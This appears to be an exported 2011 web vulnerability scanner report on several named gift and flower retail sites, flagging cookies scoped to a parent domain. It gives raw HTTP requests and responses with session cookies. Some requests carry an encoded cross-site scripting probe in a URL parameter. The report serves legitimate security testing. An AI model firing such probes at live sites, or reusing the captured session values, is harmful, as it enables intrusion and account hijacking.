SEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_JXtz=MLsXtzE1ZxpnJ5GrHvmWF/KWrPo31Agpb5slCPedGNAwVTi74gkGz+Ioj4EWp+/DHqged2X1aG4UUDn9Sek+jWM8PzolTSqS7RsUjlJjpOBJV4OQhg8QGT4qzmd32wLpi/idGBjih+awrUoKWaJ0K1B1Lomb0QkvRD26c4T9RWug2cO4FjzKAUk/0qUcoDTyVussQkDgGXRawu/DgYy8AQYowPQYovmciLKxDbxy63oR0tY9ui/NiCYn/cnzTG4mUrhXRSpVst8UQQg9UDg0tgeixM8uBejqsKnVnMHc9P9FTM7x/ggwgrQzGUjVo6BefFXgFaQMIq+AXZcR/zpqBBsaLusDfUMdaCoeRbtAAVUE2mPvTEZu/93IB+zgKsSSVbDbVKROB1dqyeuXojAa7aHmb6eu+5ZmujQ0hRHn3xtEalcmuMeIg3WRnEijYtYALyQhp73E6VAmilQtoTPiNnBpnYBOsQoPgwgptLgSn07OG+jh5lrW7RTgIKy6MXkkmkQhCWZXO5mYNKzaRPm5xTNWXdC2579VbAg5n3aFD4xHuBpLc1V4ElYMePMZdeAdlgtT0E6Bx+Nlet6sPh5w2kN9EGCAsoXpjef+SbJ6yj1XtqK/Ti4AW2t0WrjxZ+ZdhqeYyX2/xogbUb/mgHumrix8fG9wK1NOIuNbpYW55sLR+aqooY9f7I2Zb0/Y4FhxjSKXWeh8Wap9wk65kZYLh9kAq0vrvz5Qi9Q/ZEgsrAd+fuTGh+Rs0UYPCj/jKhV2sOX+dhl0rauwPPPDupVHqmA11y8OaIDcpDa40Ec+aQmnD1Fg27ft7srSL4do5uyHD6m6pzT5gt/lh1IEBu7j624K+xXaxFrGmoe9um+HHVewxEiqK1yBPju68o7c4sEE6uv1R7tqhcphC80uE6bJsLcvZGgmVNLQoRmZu+19T6S/xFwIm0CESwJweNmTY93I8wQWuSkfvZPw3CXLkLuMOgDCuaebRsxiEO6Ve6CksLxbQx9Y5wo/Y6ljLXS6W8TuXPg8Ajn5DU+Gi7u6DUWdBc3GEgPZ4yACxIzv1Ht2Sa9lB0jhrHo/7Az8dBX7jueoWaMLanZ233NKdMdp+CJe8rutyK9A4GiO/JUhmI9K6dIDyOLSc4CAUt8mYfqlj3OYYg5jHXX8T05v6nQrJDyj95cvG4Z4jCeVWfvZ67L9q8UCKCd8w/lnvZvmyZKJJHPmUsWaIp/R8cDID5iXMFfc7AjdPWSXxeIYwJg9CwbkPsH6kXw8r0Oqf+XkEFay3UyruKRLC/1ue7DUS06B9fKLJFdj1f9LkA1cTpsnTLax8shJVlffoxUmGUzIDD92ECFG+DvSakohNl+OCiyZe+o3RcTToFAQ07UwbeMPaqA3lvSgwmqNpCpclQXSYtB1HznkXyZTA53rtFtSU+gRUvyL7AbO5Nev/zyDtnqcR5ujoU8PPUHYK7LfI3Ikvsuf5Q1AXNSohTIoIOj09vCTD62+I86CBu6sVVo=; rsi_segs_1000000=pUPFJDOBMHIQVvnT1blQz8+baFxQ8VBJwUYXJQfxR8hdOmO+AHY96MgE2HH6CmX/5rpwfY7JO7GQbw+x0vTTyYTOIx2ZJQQ/7c80AtQM4pGkI6RvQfdRIcsnFzpZRgLIoXYqKwe+54D5QS81AVhvtmcaRxnciyd6EdE0KeguIATF83m4/f+fVziCnRMgl7sqU6Sa/J1XXkPZFhQYsZKhWrt1Gbzoo/ewmDD+RJz5tk5lNRf6xXNYld1nrfSo0UrDLbRZGlm7wWl6ke0ppuq4f3sCZaCIs+ZXHUE9R/CQ81JHOuOaYMbo6FoCEApDFDL/NkhPqNg7IwVDZzGwWYTLw5QZqCfu/tPHcwDKvWbqxN2eclT+QlLzUIYvwEv/oWz8LDA27cJm1eotXrOMy0BE0BzCBgZ3AotZBRfFnYOtAXoRvXQ05vrGogWxJ3y9cmr3r8HOUQ78SAC4SkFLRSG1wnfyfgaBIAfgso/P/FaCOhhqzcCrUl+VnY9xUpqKk6LIxpYUKNIMDox6kXUjig==; rsiPus_aQJL="MLsXrlcNJj5noAC3RjxwrYCq5maHIXqV3bcut8jbjWMvRZsh039NS3Rk1DZ9FWcoweu30/kjxwVsyPDJfdB85DH9528gOB025UpRMepjnWmU5D8TIKUOcYbjUmShQ76UQ8O2Id1QrZKunr/oSaJPGUD1M2FfXarUHY3vg8ahPcCT3+YklIOYYWeOEs39aYwMH1Oyzh1cKZm6xWlsnVQK5XeKBwp21ZZle9CNzTsixFNNBKikWDt9n8zOQLOr2R52VBJU62U2bbxqnBQOF3XxuZopXc4sH3ZB08xsgmPeROBLf/pw2JM4T3NBA05x3I7F7WbAB0dj8okxKlhf6fEgxEAZUbMqj6JGIl7P5CAOGFhnHbvUKII41lYc0UedLRqTrY9QebpHRhrHwF3JXBfRoX1F7IMaWwNeWtqQQPBmAEJqR7mpbUrQY5Up8y7EjtHaDOlM3vgpaWsAYiPLvByGKWPmS09u1hcRmQmwQx5N2i7SWd1s9xtLLuXK6F+6bv2iZ8qFE71HT1Kkl+hS/Lg8ZUDNNMYrZPbgIaodojTtwp2b3LGlPywHAt7VDW/DAZuseSIyU4XW5eFPyz1Y6yrhpERI2Vik8hEbsQ8B8v87bEW13Rt13SX+mcaYE5siAUoco0Vq0+dX7hBHmJpHm33cECAnbFJyK50UHkwzt+c2nKU6KGuxY/oigNYJTV/sTm1adr+u7qtftuRwvDTeycarJ5BVmeTth8ruRZ1LgSNT/fpZx8Q4MvMQduiArZ4nRHmKTuHSvs2hGnE7UjfV+u2IOo9ma1WP/A=="; rsi_us_1000000="pUMdIz9HMAYU1O2uQ7bkjytG2HRpKcZ9iWeqPjy9kUWtl6xHCau2KMfgIXcPB8e/BpyfjtTtphAROxiuC83s+lEsRUrjgTlU1Q6ETbocY99WQN8dgTYd2TIldE82taHLaxy+Nydj7bjxqRSEzydoNKcidj8e3cwbw247cKkh0bvF6cW05IwoxL3mn8eGwNjtE8wBzFJ246UcorTvpQmlUzFWkSAdzpSiAiPPsJIE8lbllqVolddNGM9UughUMVmJRRI4QxwiFiwtc6KIkleGTyQORbnreQFdhoy9tIXJDzDUrzQQPFg53TtcFU0IzSRyZT7Ysrwwl1bCknBlQyPjhUJ76l2w0sAMYL8wdNz8+XZcRcYKvvD/UrCKooUt/aj0R6J70YEugNGsaI/NdjyO0otwfzNbegXYLqm4kbsRDLCOaFswANa5kumj+Myz7WFxFbCzByPlnMLG/iRprYhnnkwcpoUb94vjivtXsRNU8sY+9nJ/GyK0btkNncXgdCWK6F6Oq130DYl7qVO7toWR/7nBkQRQIHLYme9RaVkdGxQWzXlbDG+28P2rHEEKz1Jjq3MinipUFDb/X+skn0RAc5T2sv30M4M6SF5um2GeWtPGlm5/Kb7BBThW/rN4hbbJoIkTzsbd8cjyEyF0/6eY8Ql2WYO/ugwtD3KZKjg5FVoYYefZZL5FOyh5daP5P/acL+xvjHz+q/GKm+7UEbKgyi9riSc6BmVdwLpaoKChjgmndfydm9Rp55qJhAVzniaZx4ZfHgIJVo9ZqKvelViCz7jBcU+V22aO+QATsHM3O7khIxKxUpkTaNd2kuV2SDDKynS7pV755LqyKqSMIL9wDkqmG7I+PrM991cy7UOrI9CvhRsR0dGASBwDlIzEsz74PHZLjOOmhUndtuC+D9t3Pq9su4Qx5Gs+t+I1W2txXTMTAcv2+R94m2kL+BDy7SPgGZGE0LncHJN7qYordxYyuPDkLDO+RTaY+dG9ss66V7iVeW1Vpey8S0+SwK+SzonThNqM/B2m/bV6ZSXYt/prvJB/MoIZP7SVL30KjWZ5/nCFvqlj310LdQdx0sQ7a5cozfA89Wdmx6jAkGQrp47QDxo74bzIxU7oFU3eB48wpYTTqzPon/N/QOCsyy2tlb0vJptzVJDknJSV4Q5JHz84YjU8xY+F+7133qycHPNZitpdKfZe0t1RvmPf+XiCaa8BsDly/gBuN8TvoXnO8CAEwaesRAiFwcVqRagT7jCCmYzHi3EpHSIU6iFVXHlFHEhbdShbrC6g1B1Dr34GmQRkEjan4C1Evhax4yYJfFg/As+UsUZxBW0pXt5DzJCs/6I4Jli5U0q36mqAAXwqUxTeVjFtUsmZcR5liY8B3SY9pZ48EVHSp+luF/CLoxOj2+gMyXe3zIStYnrdo0U="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rtc_JXtz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5E+BsXIQT7v8flOljrAByA1W2ycLqLcluVNv9K55n2eInpkeKzd0i8xbZOw2uBymAsekHTwXtpxx6X9QD1SJv2fw+YUoCsZRmCQYyjnQFQDPVfiYLeSoPxDBs89GWWbRUoRZrPYPRzYFf2oW7z9E4935niTvO+hYyvUJ1hgkhKNykF+vhgAdnVcJkCktu6nmYMKYjipirvscWXOQUM/muJngKMXOdiUUr5H8iSfUS1Ti9zDxtJZ3a4czan0kSMmQx+yu5iu0vjyaeuZUtgU8lKzHoFuDL1t1EXS9Wk5gVkA14oI9Z3BwztVExZGUHmKrl0J+PfTd1kHFZrKuTKD0M5ShSkbZRYXgRTa8ZHAfRJlfMDNpnALK3uAp0XE+BKhu4adINtXpLS/Qg8n2XHs0abQpDsM1AaNNUelKIaY3OH5Q/2xunvwlEIMyZjQYvOh3lFgasKdor2OvGa71mS4N1jn3yucbenW/rUUS0XrstbH5Y4v5VYYn8yLbpeMAGpL4pg+Go0xcg5bMw5s6uie4a47d; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:02:54 GMT; Path=/
Set-Cookie: rtc_jOph=MLvntzM1ZwprJ5GrFviWjmmgATvMNHGJjojTTrWSZIpIFNkgDw/K4gucx48Ansn8gFdhbSFjRTa6QTj/I+16qFvFR8txZ3XhW+h/MeB/oGJTuWd71KWU93xLd4iO2rbczqqb71ITWUbp6EX0wNdtopvMxVqaM1JqYfNKs97ZtBaRULM0PwDcs+nUakr6T4pQ6ZAhwqqC8M5QeQgL3Mwz/l/LO7TuRHS3DG/WEBaa4GMZypMTtieoEqNYKS5uaQdc9YsZ/I7stOdJLd7Hv2XYRUoNtaop227HsWyGbHxMn003mjucGc0mruqE+6DHP6brM6nM6x/tn7oZ2DjdBMJUOZiv9xqjlXnqcVjrB3kXcNTeDq09E5IMKoYrVJlZkK6uobYwka3tRmxkmifKh23k49KG9Bf6S2yRaNGnAYLK+zm7JATIxubd282sNX+n1154JTW43J8wLUy5/9w1/V1bn+LfnLjopCoy5O0KIgr5+yVcorYv+yTBZ8FhgCJA+Q8QvQjH/z6qkFkkgV2Pc0Qu8ePOuvk8qolmk5a5cRl/uMAl5d1L5fAWohFKLmeKHnIc1teXHxZ62z3xlAPoH3vSe3gvL1dmnj44UotfcgD9gjypLg/DU9uqsl/Rdd2M4KoI4aNAtW2PewAt7/uqPhIVZ2lA67g753Fs+YYdF+aGv8uJwGCyFeT/2FR7o49m55h8Gwxj243dmAFbzNMgnnyKGgxLPowo3XlGRBBhnfGcjmQaduyakw2Situk66TlalCm1TQvRzzJbNCx+dssYOfOQB0bbtJ2ntUVoY0/MWG+7X9mFMcU0K1YsXlTv3JLgSG9szKwKoXeXI5nGPmexJQamIZZRu75FQen7qI5XVSM/FyhyjLG6RJHjFKcgLVTWbop0qonwtOz+dRaa+XzimvUgmjE/LsOByg4WyNecM6WuqsLzQSwbwkJu6ayeu/z8NTC7c0uuc9GN4iMyZ0VRwyeREtwXmyzI9BFcLyZ3Rs4ivUj2RjCjvtSsNNRHe2053cF2Vi66vu8vK0TwhhQ+4nNefilYUbTA6wV1dbQtthV8yc5tkCS4xO8RM2JqwjJ+2RL0MnC0HJ4Sa9kFkqhq5GF29eaWIKbJnhrkHmZYVI20kuZatlwGXCzd05n7WE/cFig6PF+oHMyVEvg3H2Geqve6dtrbR5/nlqFYJUJmU1LO9t6E30Vexgt/OqPCKtq5Buy0heNFn43D/XEPUM075oPE41B7rGtcoZLDHSX5xusWqM7Xz3Yy0rj1w/OGBhEfzOXP0tA8vgBAjPNzEOqo9q4g3TV0zqIlK03g3UEsVsKd8lrYh6vves5TCqBe0HeDGyLF1ZryuAIiKWwjLAn92Tu49HaCCp5ZapUWKSIpxW6EBmQA4m6a+VSTrtsZqZKuqbIAMmb6Z5nlEJ0CvScdpzM8bELtNupCMCENC4+mcWsy8PXof63WNfpjPhyWcxL6XPwO+XIvL1yoRu187rFg4rnh0OUfdRdE7b+DsMlXGSWyiWEOb7KYoa7LZDfbPfYMXY=; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:02:54 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://a3ca190b6a3d9a078/a?http://ads.revsci.net/adserver/ako?activate&type=gif&csid=K10145
Content-Length: 0
Date: Mon, 09 May 2011 01:02:53 GMT

12. Cookie scoped to parent domain  previous  next
There are 39 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

12.1. http://ww30.1800baskets.com/include/cookieCloner.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800baskets.com
Path:   /include/cookieCloner.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /include/cookieCloner.asp?tablink=true&redirecturl=template.do?id=template3&page=2000&persistent=847b741e4593439b8e3ed6040ba46630&shopperid=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618&brandCode=1001&banner= HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 01:15:57 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Location: http://ww30.1800baskets.com/template.do?id=template3&page=2000
Content-Length: 0
Set-Cookie: JSESSIONID=0000s_k0fIDZcMvgOtLcaDZHOiR:-1; Path=/
Set-Cookie: ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; Expires=Thu, 06-May-21 01:15:56 GMT; Path=/; Domain=1800baskets.com
Set-Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; Path=/; Domain=1800baskets.com
Set-Cookie: brandCode=1001; Path=/; Domain=1800baskets.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/plain
Content-Language: en-US

12.2. http://ww30.1800flowers.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800flowers.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:38 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: FSESSIONID=2f6aa588e33f44c3bb0191955def6935; Path=/; Domain=1800flowers.com
Set-Cookie: brandCode=1001; Path=/; Domain=1800flowers.com
Set-Cookie: ShopperManagerEnterprise=41db6fdb-b7c6-458a-b4c5-a2060d927f3c; Expires=Thu, 06-May-21 01:00:38 GMT; Path=/; Domain=1800flowers.com
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 63361


<html>

<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<!--MSN--><meta name="msvalidate.01" content="7372219C2822
...[SNIP]...
12.3. http://www.cherrymoonfarms.com/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cherrymoonfarms.com
Path:   /default.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.cherrymoonfarms.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=p4m5s4gmscsdxjspfxzi5djy; domain=cherrymoonfarms.com; path=/
Set-Cookie: ASP.NET_SessionId=p4m5s4gmscsdxjspfxzi5djy; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_CMF=TestAssignmentValues=nta-2,xca-1,nte-1,cpz-1,csc-4,ntb-1,ntc-1,xcb-1,xcc-1,cfq-1,ntd-2; domain=.cherrymoonfarms.com; expires=Sat, 09-Jun-2012 12:22:05 GMT; path=/
Set-Cookie: ENDOFDAY_CMF=TestAssignmentValues=,chh-1,cks-1,mpsmediapersonalitysplit-1,ckt-2; domain=.cherrymoonfarms.com; expires=Tue, 10-May-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_CMF=TestConfigDateTimeUpdated=5/9/2011 5:22:05 AM; domain=.cherrymoonfarms.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=57; domain=.cherrymoonfarms.com; expires=Thu, 12-May-2011 12:22:05 GMT; path=/
Set-Cookie: CMF_BrowserId=648da04f-a5ff-42b4-9370-fae55b915cad; domain=.cherrymoonfarms.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: CMF_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.cherrymoonfarms.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:22:04 GMT
Content-Length: 107521


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/st
...[SNIP]...
12.4. http://www.personalcreations.com/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /default.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.personalcreations.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=wz0kwfor3fvne2lfjnllwoah; domain=personalcreations.com; path=/
Set-Cookie: ASP.NET_SessionId=wz0kwfor3fvne2lfjnllwoah; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PCR=TestAssignmentValues=nta-1,ttb-3,nte-3,ntc-2,tpr-1,ntb-1,xta-1,tpp-4,tbc-2,ntd-1,xtc-1,tmm-1,xtb-1,trr-2,tvo-1,tpf-1; domain=.personalcreations.com; expires=Sat, 09-Jun-2012 12:23:17 GMT; path=/
Set-Cookie: ENDOFDAY_PCR=TestAssignmentValues=,txb-1,tkt-2,thp-2,txa-2,tks-1,txc-1,mpsmediapersonalitysplit-2; domain=.personalcreations.com; expires=Tue, 10-May-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PCR=TestConfigDateTimeUpdated=5/9/2011 5:23:17 AM; domain=.personalcreations.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=5; domain=.personalcreations.com; expires=Thu, 12-May-2011 12:23:17 GMT; path=/
Set-Cookie: PCR_BrowserId=7e39bf7a-035a-482a-a5ba-f1400b3f220a; domain=.personalcreations.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PCR_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.personalcreations.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:23:19 GMT
Content-Length: 120465


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/st
...[SNIP]...
12.5. http://www.proflowers.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.proflowers.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=vdbbjo2ye2hg5x4cildhrv3t; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=vdbbjo2ye2hg5x4cildhrv3t; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-2,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-7,nte-3,phl-2,ppv-3,phr-1,nta-1,xpc-1,ntb-1,pnp-1,ppr-1,pmm-2,pem-1,pfe-3,pml-0; domain=.proflowers.com; expires=Sat, 09-Jun-2012 12:07:41 GMT; path=/
Set-Cookie: ENDOFDAY_PFC=TestAssignmentValues=,pxc-3,mpsmediapersonalitysplit-1,zzd-1,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; domain=.proflowers.com; expires=Tue, 10-May-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:41 AM; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=50; domain=.proflowers.com; expires=Thu, 12-May-2011 12:07:41 GMT; path=/
Set-Cookie: PFC_BrowserId=92c68dc8-4b77-41de-89a7-78ac8cdfbbd3; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:07:40 GMT
Content-Length: 88497


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
12.6. http://www.proflowers.com/house-plants-PBS  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.proflowers.com
Path:   /house-plants-PBS

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 